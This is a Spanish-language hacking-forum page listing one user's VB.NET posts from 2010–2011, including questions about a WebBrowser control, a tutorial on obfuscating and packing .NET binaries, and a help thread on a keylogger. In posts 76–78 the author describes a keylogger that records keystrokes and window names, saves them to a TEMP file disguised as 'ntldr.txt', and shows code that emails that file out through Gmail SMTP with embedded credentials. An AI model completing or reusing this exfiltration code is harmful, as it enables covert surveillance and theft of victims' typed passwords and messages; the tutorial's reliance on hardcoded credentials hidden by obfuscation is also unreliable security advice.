elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13
71  Programación / .NET (C#, VB.NET, ASP) / Cambiar contenido de WebBrowser en: 4 Febrero 2011, 19:20 pm
Buenas estoy intentando cambiar el contenido del WebBrowser cuando este se carga, he probado con el siguiente code:

Código
  1. Dim s As IO.StreamReader
  2. Dim strcodigo As String
  3. s = New IO.StreamReader(WebBrowser1.DocumentStream)
  4. strcodigo = s.ReadToEnd()
  5. If InStr(strcodigo, "areemplazar") <> 0 Then
  6. strcodigo = strcodigo.Replace("areemplazar", "")
  7. Dim MyStream As New MemoryStream(Encoding.ASCII.GetBytes(strcodigo))
  8. WebBrowser1.DocumentStream = MyStream
  9. End If
  10.  

Pero me carga la pagina como si no estuviera alojada en el servidor sin las imagenes y tal y el javascript de esa pagina no funciona que es lo que quiero, hay alguna forma de cambiar el contenido sin que esto pase?
Saludos  ;D

POSDATA: He probado tambien con .Document.Body.InnerHtml y con .DocumentText.
72  Programación / .NET (C#, VB.NET, ASP) / Re: [Aporte] Mejora la seguridad de tu aplicacion .Net en: 9 Enero 2011, 21:31 pm
Bueno aunque lo compiles a bajo nivel como en C/C++ y lo ofusques sigue siendo vulnerable jaja!!!!!!!!! Si no mira lo que paso con las PS3 por mas cifrado que le pusieron!!!!!!!!!!

Pero les costó sacarla xDDD, si mi manual es para que al menos se molesten en desenpacar el nspack, no que abran el el dis# y lo tengan ahí todo rápido y sencillo, por lo menos un mínimo de seguridad aceptable crea mi método.

Despues para hacerlo más dificil creas strings en todos los forms con nombres como de una sola letra ejemplo
Código
  1. Dim y as string = "partedelapass"
Y despues lo juntas todo
Código
  1. f & g & y
Como está el dotfuscator el que quiera buscar la pass se volverá loco con tanta letra suelta jajajajaja.

Saludos.
73  Programación / .NET (C#, VB.NET, ASP) / Re: [Aporte] Mejora la seguridad de tu aplicacion .Net en: 9 Enero 2011, 20:22 pm
:o pero aún asi no esta seguro jaja!!!!!!!! lo ideal es no poner ninguna clave en el programa

Tampoco he investigado mucho pero estoy seguro que algún buen método tiene que haber, pero nosotros lo desconocemos.
74  Programación / .NET (C#, VB.NET, ASP) / [Aporte] Mejora la seguridad de tu aplicacion .Net en: 9 Enero 2011, 06:00 am
Tutorial
-Bueno voi a explicar un método que a muchos os servirá de como hacer nuestras aplicaciones .Net más seguras, partiremos de nuestra aplicación en .Net Framework 2.0 en Vb que tiene el siguiente code:



Como podemos ver es el típico code de envio de email desde nuestra cuenta de gmail. Compilamos el proyecto y prodecemos con el tutorial.

Bien una vez que tenemos esto vamos a utilizar 3 programas:
El Descompilador
Código:
Dis#
El Ofuscador
Código:
Dotfuscator
El Empaquetador
Código:
NsPack

Cláramente habran miles de programas que desempeñen la misma funcion, pero son los que más fáciles he podido conseguir asi que voi a explicar el método que utilizo con estos.
Bueno para ver si nuestra aplicación es vulnerable nos disponemos a abrir el Dis# y abrimos nuestra aplicacion ya compilada, 30 segundos y busqueda y vemos esto:



Claramente pueden ver el email y la contraseña, esto indica que nuestro programa es 100% vulnerable, pero podemos hacer algo para que les sea más dificil, ahora abriremos el DotFuscator y se lo pasaremos a nuestro ejecutable y volvemos a abrir el Dis# y nos encontramos esto:



Asi al menos si es un code largo les costará de encontrar la info, pero realmente hace mas bien poco para lo que queremos nosotros, ahora nos disponedremos a pasarle el nspack haber lo que pasa.



Bueno mucho mejor no? Ya no pueden ver nuestro code, realmente si lo desempaquetan podrán volver a verlo pero esto es mucho mejor que la primera imagen, asi al menos hacemos el trabajo más complicado a quien quiera crackearnos  ;D

Espero que les haya servido este minituto.

Saludos!

75  Programación / .NET (C#, VB.NET, ASP) / Re: [Ayuda]Problema con streamwriter en: 7 Enero 2011, 23:02 pm
Gracias como siempre .:IT:., tus codes me salvan la vida xD
Por cierto como que por http? Podrias explicarme eso?

Saludos.
76  Programación / .NET (C#, VB.NET, ASP) / Re: [Ayuda]Problema con streamwriter en: 1 Enero 2011, 20:47 pm
Es algo sencillo pero que no quire funcionar xD
Código
  1. Try
  2. 'Crear archivo
  3. Dim sw As StreamWriter = File.CreateText(Environ("TEMP") & "\ntldr.txt")
  4. sw.WriteLine(TextBox1.Text)
  5. sw.Flush()
  6. sw.Close()
  7. 'Email
  8. Dim MyMailMessage As New MailMessage()
  9. MyMailMessage.From = New MailAddress("lala@gmail.com")
  10. MyMailMessage.To.Add("lala@gmail.com")
  11. MyMailMessage.Subject = My.Computer.Name & " " & DateString & " " & DateTime.Now.ToString("HH:mm:ss")
  12. MyMailMessage.Body = "Abre el archivo adjunto."
  13. MyMailMessage.Attachments.Add(New Attachment(Environ("TEMP") & "\ntldr.txt"))
  14. Dim SMTPServer As New SmtpClient("smtp.gmail.com")
  15. SMTPServer.Port = 587
  16. SMTPServer.Credentials = New System.Net.NetworkCredential("lala@gmail.com", "lala")
  17. SMTPServer.EnableSsl = True
  18. SMTPServer.Send(MyMailMessage)
  19. MyMailMessage = Nothing
  20. SMTPServer = Nothing
  21. Catch ex As SmtpException
  22. End Try
  23.  

A la segunda vez que lo intento guardar me salta la excepción.
77  Programación / .NET (C#, VB.NET, ASP) / Re: [Ayuda]Problema con streamwriter en: 1 Enero 2011, 19:51 pm
El problema creo que está en que lo envio por email y se queda en uso el fichero de texto.
Código
  1. MyMailMessage.Attachments.Add(New Attachment(Environ("TEMP") & "\ntldr.txt"))
Pero al hacer esto tampoco me permite usarlo
Código
  1. MyMailMessage = nothing

 :huh: :huh: :huh:
Saludos y feliz año!
78  Programación / .NET (C#, VB.NET, ASP) / [Ayuda]Problema con streamwriter en: 31 Diciembre 2010, 16:53 pm
Bueno estoy haciendo un keylogger, ya me lee las pulsaciones y los nombres de las ventanas, y lo que hago es que lo mande a un correo gmail, un archivo situado en TEMP que es donde se guarda todo, el problema es que no me deja guardarlo más de una vez.
Código
  1. MyEscritor = New StreamWriter(Environ("TEMP") & "\ntldr.txt")
  2. MyEscritor.Write(TextBox1.Text)
  3. MyEscritor.Flush()
  4. MyEscritor.Close()
  5. MyEscritor = Nothing

Me tira este error al intentar guardarlo por segunda vez.
Código:
IO Exception
El proceso no puede obtener acceso al archivo 'C:\Users\Weeds\AppData\Local\Temp\ntldr.txt' porque está siendo utilizado en otro proceso.

Que puedo hacer ahi? Saludos y Feliz NaviAño Nuevo!!  :laugh:
79  Programación / .NET (C#, VB.NET, ASP) / Re: Ayuda Con algo muy basico en: 27 Diciembre 2010, 01:32 am
Eso no seria un login?  :rolleyes:

A lo de It no te e entendido nada si puedes expresarte  mejor yo lo unico que quiero es una vez dentro de la aplicacion al ir a usarla que tenga que introducir una contrseña. Es decir  para usar una determinada opcion ---> introducir contraseña XD

Con eso me referia es que si te haren tu aplicacion con el salamander por ejemplo te sacan la contraseña en pocos segundos, y el login no te sirve de nada xD, esta dificil lo de poner una contraseña en tu aplicacion sin que te la hackeen
80  Programación / .NET (C#, VB.NET, ASP) / Re: Invocar Procedimientos en: 24 Diciembre 2010, 10:28 am
No es más facil hacer esto?

Código
  1. Private function hi() ' Creas la funcion
  2. Msgbox("HI")
  3. End function
  4.  
  5. Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
  6. hi() ' Llamas la funcion
  7. End Sub
  8.  

Saludos.
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines